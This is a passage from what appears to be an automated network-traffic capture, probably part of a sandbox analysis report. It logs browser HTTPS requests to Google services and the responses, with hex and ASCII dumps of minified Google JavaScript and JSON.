2024-12-31 08:46:15 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-31 08:46:15 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
2024-12-31 08:46:15 UTC	781	IN	Data Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 34 33 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700243,3700949,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_\|\|{};(function(_){va
2024-12-31 08:46:15 UTC	389	IN	Data Raw: 31 37 65 0d 0a 63 6b 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 5f 2e 41 64 5c 75 30 30 33 64 74 79 70 65 6f 66 20 41 73 79 6e 63 43 6f 6e 74 65 78 74 21 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 75 6e 64 65 66 69 6e 65 64 5c 22 5c 75 30 30 32 36 5c 75 30 30 32 36 74 79 70 65 6f 66 20 41 73 79 6e 63 43 6f 6e 74 65 78 74 2e 53 6e 61 70 73 68 6f 74 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 66 75 6e 63 74 69 6f 6e 5c 22 3f 61 5c 75 30 30 33 64 5c 75 30 30 33 65 61 5c 75 30 30 32 36 5c 75 30 30 32 36 41 73 79 6e 63 43 6f 6e 74 65 78 74 2e 53 6e 61 70 73 68 6f 74 2e 77 72 61 70 28 61 29 3a 61 5c 75 30 30 33 64 5c 75 30 30 33 65 61 3b 5c 6e 7d 63 61 74 63 Data Ascii: 17eck\");\n}catch(e){_._DumpException(e)}\ntry{\n_.Ad\u003dtypeof AsyncContext!\u003d\u003d\"undefined\"\u0026\u0026typeof AsyncContext.Snapshot\u003d\u003d\u003d\"function\"?a\u003d\u003ea\u0026\u0026AsyncContext.Snapshot.wrap(a):a\u003d\u003ea;\n}catc
2024-12-31 08:46:15 UTC	1390	IN	Data Raw: 38 30 30 30 0d 0a 7d 3b 5f 2e 44 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 5f 2e 43 64 28 5f 2e 68 64 2e 69 28 29 2c 61 29 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 2f 2a 5c 6e 5c 6e 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 5c 6e 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 5c 6e 2a 2f 5c 6e 76 61 72 20 47 64 3b 5f 2e 45 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 5c 75 30 30 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 Data Ascii: 8000};_.Dd\u003dfunction(a){return _.Cd(_.hd.i(),a)};\n}catch(e){_._DumpException(e)}\ntry{\n/\n\n Copyright Google LLC\n SPDX-License-Identifier: Apache-2.0\n/\nvar Gd;_.Ed\u003dfunction(a){const b\u003da.length;if(b\u003e0){const c\u003dArray(b);for
2024-12-31 08:46:15 UTC	1390	IN	Data Raw: 68 28 62 29 7b 7d 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 53 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 52 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 5c 75 30 30 32 36 5c 75 30 30 32 36 28 52 64 5c 75 30 30 33 64 51 64 28 29 29 3b 72 65 74 75 72 6e 20 52 64 7d 3b 5c 6e 5f 2e 55 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 63 6f 6e 73 74 20 62 5c 75 30 30 33 64 5f 2e 53 64 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 54 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 56 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 54 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c Data Ascii: h(b){}return a};_.Sd\u003dfunction(){Rd\u003d\u003d\u003dvoid 0\u0026\u0026(Rd\u003dQd());return Rd};\n_.Ud\u003dfunction(a){const b\u003d_.Sd();return new _.Td(b?b.createScriptURL(a):a)};_.Vd\u003dfunction(a){if(a instanceof _.Td)return a.i;throw Error(\
2024-12-31 08:46:15 UTC	1390	IN	Data Raw: 33 64 6e 65 77 20 66 65 29 7d 3b 5f 2e 69 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 74 79 70 65 6f 66 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69 6e 67 5c 22 3f 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 29 3a 62 7d 3b 5f 2e 55 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 5c 75 30 30 33 64 62 7c 7c 64 6f 63 75 6d 65 6e 74 3b 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 3f 61 5c 75 30 30 33 64 63 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 61 29 5b 30 5d 3a 28 63 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2c 61 3f 61 5c 75 30 30 33 64 28 62 7c 7c 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 Data Ascii: 3dnew fe)};_.ie\u003dfunction(a,b){return typeof b\u003d\u003d\u003d\"string\"?a.getElementById(b):b};_.U\u003dfunction(a,b){var c\u003db\|\|document;c.getElementsByClassName?a\u003dc.getElementsByClassName(a)[0]:(c\u003ddocument,a?a\u003d(b\|\|c).querySelect

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:46:15 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-31 08:46:15 UTC	933	IN	HTTP/1.1 200 OK Version: 705503573 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Tue, 31 Dec 2024 08:46:15 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-31 08:46:15 UTC	35	IN	Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-12-31 08:46:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-12-31 08:46:18 UTC	733	OUT	GET /_/scs/abc-static/_/js/k=gapi.gapi.en.ZpMpph_5a4M.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo_c5__TAiALeuHoQOKG0BnSpdbJrQ/cb=gapi.loaded_0 HTTP/1.1 Host: apis.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-31 08:46:19 UTC	916	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Access-Control-Allow-Origin: * Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/social-frontend-mpm-access Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="social-frontend-mpm-access" Report-To: {"group":"social-frontend-mpm-access","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/social-frontend-mpm-access"}]} Content-Length: 117446 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Sat, 28 Dec 2024 16:58:49 GMT Expires: Sun, 28 Dec 2025 16:58:49 GMT Cache-Control: public, max-age=31536000 Last-Modified: Mon, 02 Dec 2024 19:15:50 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Age: 229649 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-31 08:46:19 UTC	474	IN	Data Raw: 67 61 70 69 2e 6c 6f 61 64 65 64 5f 30 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 28 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 74 79 70 65 6f 66 20 73 65 6c 66 21 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 73 65 6c 66 3a 74 68 69 73 29 2e 5f 46 5f 74 6f 67 67 6c 65 73 3d 61 7c 7c 5b 5d 7d 3b 28 30 2c 5f 2e 5f 46 5f 74 6f 67 67 6c 65 73 5f 69 6e 69 74 69 61 6c 69 7a 65 29 28 5b 5d 29 3b 0a 76 61 72 20 63 61 2c 64 61 2c 68 61 2c 6d 61 2c 78 61 2c 41 61 2c 42 61 3b 63 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 Data Ascii: gapi.loaded_0(function(_){var window=this;_._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([]);var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var
2024-12-31 08:46:19 UTC	1390	IN	Data Raw: 61 6c 75 65 3b 72 65 74 75 72 6e 20 61 7d 3b 0a 68 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 61 3d 5b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 26 26 67 6c 6f 62 61 6c 54 68 69 73 2c 61 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 2c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 5d 3b 66 6f 72 28 76 61 72 20 62 3d 30 3b 62 3c 61 2e 6c 65 6e 67 74 68 3b 2b 2b 62 29 7b 76 61 72 20 63 3d 61 5b 62 5d 3b 69 66 28 63 26 26 63 2e 4d 61 74 68 3d 3d 4d 61 74 68 29 72 65 74 75 72 6e 20 63 7d 74 68 72 6f 77 20 45 72 72 6f 72 28 22 61 22 29 3b 7d 3b Data Ascii: alue;return a};ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};
2024-12-31 08:46:19 UTC	1390	IN	Data Raw: 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 3d 61 3b 72 65 74 75 72 6e 20 6e 65 77 20 62 7d 2c 71 61 3b 69 66 28 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 71 61 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3b 65 6c 73 65 7b 76 61 72 20 72 61 3b 61 3a 7b 76 61 72 20 73 61 3d 7b 61 3a 21 30 7d 2c 77 61 3d 7b 7d 3b 74 72 79 7b 77 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 73 61 3b 72 61 3d 77 61 2e 61 3b 62 72 65 61 6b 20 61 7d 63 61 74 63 68 28 61 29 7b 7d 72 61 3d 21 31 7d 71 61 3d 72 61 3f 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 62 3b 69 66 28 Data Ascii: function(a){var b=function(){};b.prototype=a;return new b},qa;if(typeof Object.setPrototypeOf=="function")qa=Object.setPrototypeOf;else{var ra;a:{var sa={a:!0},wa={};try{wa.__proto__=sa;ra=wa.a;break a}catch(a){}ra=!1}qa=ra?function(a,b){a.__proto__=b;if(
2024-12-31 08:46:19 UTC	1390	IN	Data Raw: 7b 66 6f 72 28 3b 74 68 69 73 2e 46 66 26 26 74 68 69 73 2e 46 66 2e 6c 65 6e 67 74 68 3b 29 7b 76 61 72 20 68 3d 74 68 69 73 2e 46 66 3b 74 68 69 73 2e 46 66 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6b 3d 30 3b 6b 3c 68 2e 6c 65 6e 67 74 68 3b 2b 2b 6b 29 7b 76 61 72 20 6c 3d 68 5b 6b 5d 3b 68 5b 6b 5d 3d 6e 75 6c 6c 3b 74 72 79 7b 6c 28 29 7d 63 61 74 63 68 28 6d 29 7b 74 68 69 73 2e 6d 71 28 6d 29 7d 7d 7d 74 68 69 73 2e 46 66 3d 6e 75 6c 6c 7d 3b 62 2e 70 72 6f 74 6f 74 79 70 65 2e 6d 71 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 7a 50 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 72 6f 77 20 68 3b 0a 7d 29 7d 3b 76 61 72 20 65 3d 66 75 6e 63 74 69 6f 6e 28 68 29 7b 74 68 69 73 2e 45 61 3d 30 3b 74 68 69 73 2e 77 66 3d 76 6f 69 64 20 30 3b 74 68 69 Data Ascii: {for(;this.Ff&&this.Ff.length;){var h=this.Ff;this.Ff=[];for(var k=0;k<h.length;++k){var l=h[k];h[k]=null;try{l()}catch(m){this.mq(m)}}}this.Ff=null};b.prototype.mq=function(h){this.zP(function(){throw h;})};var e=function(h){this.Ea=0;this.wf=void 0;thi
2024-12-31 08:46:19 UTC	1390	IN	Data Raw: 68 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 74 79 70 65 6f 66 20 6b 3d 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 3f 68 3d 6e 65 77 20 6b 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 7b 63 61 6e 63 65 6c 61 62 6c 65 3a 21 30 7d 29 3a 28 68 3d 5f 2e 6c 61 2e 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 43 75 73 74 6f 6d 45 76 65 6e 74 22 29 2c 68 2e 69 6e 69 74 43 75 73 74 6f 6d 45 76 65 6e 74 28 22 75 6e 68 61 6e 64 6c 65 64 72 65 6a 65 63 74 69 6f 6e 22 2c 21 31 2c 21 30 2c 68 29 29 3b 68 2e 70 72 6f 6d 69 73 65 3d 74 68 69 73 3b 68 2e 72 65 61 73 6f 6e 3d 74 68 69 73 2e 77 66 3b 72 65 74 75 72 6e 20 6c 28 68 29 7d 3b 65 2e 70 72 6f 74 6f 74 79 Data Ascii: h("unhandledrejection",{cancelable:!0}):typeof k==="function"?h=new k("unhandledrejection",{cancelable:!0}):(h=_.la.document.createEvent("CustomEvent"),h.initCustomEvent("unhandledrejection",!1,!0,h));h.promise=this;h.reason=this.wf;return l(h)};e.prototy
2024-12-31 08:46:19 UTC	1390	IN	Data Raw: 64 6f 6e 65 29 7d 29 7d 3b 72 65 74 75 72 6e 20 65 7d 29 3b 76 61 72 20 43 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 61 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 27 74 68 69 73 27 20 76 61 6c 75 65 20 66 6f 72 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 6e 75 6c 6c 20 6f 72 20 75 6e 64 65 66 69 6e 65 64 22 29 3b 69 66 28 62 20 69 6e 73 74 61 6e 63 65 6f 66 20 52 65 67 45 78 70 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 46 69 72 73 74 20 61 72 67 75 6d 65 6e 74 20 74 6f 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 22 2b 63 2b 22 20 6d 75 73 74 20 6e 6f 74 20 62 65 20 61 20 72 65 67 75 6c Data Ascii: done)})};return e});var Ca=function(a,b,c){if(a==null)throw new TypeError("The 'this' value for String.prototype."+c+" must not be null or undefined");if(b instanceof RegExp)throw new TypeError("First argument to String.prototype."+c+" must not be a regul
2024-12-31 08:46:19 UTC	1390	IN	Data Raw: 5f 68 69 64 64 65 6e 5f 22 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 3b 65 28 22 66 72 65 65 7a 65 22 29 3b 65 28 22 70 72 65 76 65 6e 74 45 78 74 65 6e 73 69 6f 6e 73 22 29 3b 65 28 22 73 65 61 6c 22 29 3b 76 61 72 20 68 3d 30 2c 6b 3d 66 75 6e 63 74 69 6f 6e 28 6c 29 7b 74 68 69 73 2e 46 61 3d 28 68 2b 3d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2b 31 29 2e 74 6f 53 74 72 69 6e 67 28 29 3b 69 66 28 6c 29 7b 6c 3d 5f 2e 79 61 28 6c 29 3b 66 6f 72 28 76 61 72 20 6d 3b 21 28 6d 3d 6c 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 3b 29 6d 3d 6d 2e 76 61 6c 75 65 2c 74 68 69 73 2e 73 65 74 28 6d 5b 30 5d 2c 6d 5b 31 5d 29 7d 7d 3b 6b 2e 70 72 6f 74 6f 74 79 70 65 2e 73 65 74 3d 66 75 6e 63 74 69 6f 6e 28 6c 2c 6d 29 7b 69 66 28 21 63 28 6c 29 29 74 68 72 6f 77 20 45 Data Ascii: _hidden_"+Math.random();e("freeze");e("preventExtensions");e("seal");var h=0,k=function(l){this.Fa=(h+=Math.random()+1).toString();if(l){l=_.ya(l);for(var m;!(m=l.next()).done;)m=m.value,this.set(m[0],m[1])}};k.prototype.set=function(l,m){if(!c(l))throw E
2024-12-31 08:46:19 UTC	1390	IN	Data Raw: 74 68 69 73 5b 31 5d 2e 53 6b 3d 6d 2e 5a 65 2c 74 68 69 73 2e 73 69 7a 65 2b 2b 29 3b 72 65 74 75 72 6e 20 74 68 69 73 7d 3b 63 2e 70 72 6f 74 6f 74 79 70 65 2e 64 65 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 6b 29 7b 6b 3d 64 28 74 68 69 73 2c 6b 29 3b 72 65 74 75 72 6e 20 6b 2e 5a 65 26 26 6b 2e 6c 69 73 74 3f 28 6b 2e 6c 69 73 74 2e 73 70 6c 69 63 65 28 6b 2e 69 6e 64 65 78 2c 31 29 2c 6b 2e 6c 69 73 74 2e 6c 65 6e 67 74 68 7c 7c 64 65 6c 65 74 65 20 74 68 69 73 5b 30 5d 5b 6b 2e 69 64 5d 2c 6b 2e 5a 65 2e 53 6b 2e 6e 65 78 74 3d 6b 2e 5a 65 2e 6e 65 78 74 2c 6b 2e 5a 65 2e 6e 65 78 74 2e 53 6b 3d 0a 6b 2e 5a 65 2e 53 6b 2c 6b 2e 5a 65 2e 68 65 61 64 3d 6e 75 6c 6c 2c 74 68 69 73 2e 73 69 7a 65 2d 2d 2c 21 30 29 3a 21 31 7d 3b 63 2e 70 72 6f 74 6f 74 Data Ascii: this[1].Sk=m.Ze,this.size++);return this};c.prototype.delete=function(k){k=d(this,k);return k.Ze&&k.list?(k.list.splice(k.index,1),k.list.length\|\|delete this[0][k.id],k.Ze.Sk.next=k.Ze.next,k.Ze.next.Sk=k.Ze.Sk,k.Ze.head=null,this.size--,!0):!1};c.protot
2024-12-31 08:46:19 UTC	1390	IN	Data Raw: 63 74 69 6f 6e 28 29 7b 69 66 28 21 61 7c 7c 74 79 70 65 6f 66 20 61 21 3d 22 66 75 6e 63 74 69 6f 6e 22 7c 7c 21 61 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 7c 7c 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 73 65 61 6c 21 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 31 3b 74 72 79 7b 76 61 72 20 63 3d 4f 62 6a 65 63 74 2e 73 65 61 6c 28 7b 78 3a 34 7d 29 2c 64 3d 6e 65 77 20 61 28 5f 2e 79 61 28 5b 63 5d 29 29 3b 69 66 28 21 64 2e 68 61 73 28 63 29 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 63 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 31 7c 7c 64 2e 61 64 64 28 7b 78 3a 34 7d 29 21 3d 64 7c 7c 64 2e 73 69 7a 65 21 3d 32 29 72 65 74 75 72 6e 21 31 3b 76 61 72 20 65 3d 64 2e 65 6e 74 72 69 65 73 28 29 2c 66 3d 65 2e 6e Data Ascii: ction(){if(!a\|\|typeof a!="function"\|\|!a.prototype.entries\|\|typeof Object.seal!="function")return!1;try{var c=Object.seal({x:4}),d=new a(_.ya([c]));if(!d.has(c)\|\|d.size!=1\|\|d.add(c)!=d\|\|d.size!=1\|\|d.add({x:4})!=d\|\|d.size!=2)return!1;var e=d.entries(),f=e.n
2024-12-31 08:46:19 UTC	1390	IN	Data Raw: 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 65 6e 74 72 69 65 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 5b 62 2c 63 5d 7d 29 7d 7d 29 3b 0a 6d 61 28 22 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 6b 65 79 73 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 61 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 29 7b 72 65 74 75 72 6e 20 62 7d 29 7d 7d 29 3b 6d 61 28 22 67 6c 6f 62 61 6c 54 68 